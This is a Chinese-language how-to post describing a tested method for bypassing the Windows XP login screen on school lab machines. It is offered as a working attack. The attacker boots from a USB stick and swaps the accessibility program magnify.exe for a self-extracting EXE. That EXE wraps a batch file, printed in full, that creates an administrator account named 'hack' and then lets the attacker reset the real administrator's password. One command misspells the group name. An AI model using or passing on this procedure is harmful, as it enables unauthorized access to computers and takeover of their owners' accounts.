所需工具
1.U盤一個
2.USBoot(U盤啟動製作軟件)
3.winrar(壓縮軟件)
這個方法我親自實驗過,並且成功的繞過了XP的登陸密碼.我在學校機房做過實驗,但是文件格式為FAT32,就不知道NTFS的行不行?本來想一起實驗的,結果我的光驅在學校機器上用不起(我的光驅有問題,機器太老了!--窮),學校的機器都是FAT32的,沒辦法!隻有下次做了!
先說說思路:方法很簡單,當你的機器出現登陸框,要求輸入密碼時,你按下windows鍵+U看看有什麼反映……?不錯!出現了輔助工具管理工具(嗬嗬~~意味著可以運行放大鏡)。既然可以運行放大鏡程序,那麼我們把放大鏡程序換成其他的程序是不是也可以運行呢?(我把它換成添加用戶的程序不就…………嗬嗬~~好壞!)思路就是這樣的了!現在我們開始製作。
①.製作U盤啟動盤。先運行Usboot,然後插入U盤,選中U盤然後點開始。(要破壞U盤上的文件哦!小心!),格式化完了把U盤拔了,然後它會提示你再插入,插入U盤1分後就可以了!我的U盤是1G的,用的HDD格式。
②.製作替換文件。要製作一個XX.EXE的文件來替換原文件,但是這個XX.EXE執行後又要達到添加用戶的要求。我首先想到的是寫一個批處理文件:
@net user hack 123456 /add
@net localgroup administraroes hack /add
@exit
然後保存為XX.bat就可以了!
又有人要問我了,我們要的是XX.EXE你卻給我們弄個XX.bat你什麼意思嘛?
問得好!我們讓它運行XX.EXE就等同運行了XX.bat不就可以了嘛!
要達到這樣的目的,就要用到winrar,用winrar製作一個自解壓文件,不就把XX.bat變成XX.EXE了嗎?運行XX.EXE就等同運行了XX.bat.(把XX.EXE拷到 U 盤上去)
③.替換文件.到COMS裏去把第一啟動換到USB-HDD,保存----插入U盤,進入係統的c:windowssystem32下去. copy magnify.exe 007magnify.exe (對magnify.exe進行備份,magnify.exe為放大鏡執行程序).在把U盤上的XX.EXE拷到system32下,並該為 magnify.exe就可以了!
然後從硬盤啟動就可以了!再到XP登陸密碼時,你隻要運行放大鏡就可以了!按下Ctrl+Alt+Del(按2次)用你新建的hack用戶就可以進去了!進去把管理員密碼改過來吧!
這樣就成功的繞過了XP的登陸密碼,隻要了一個U盤,好方便。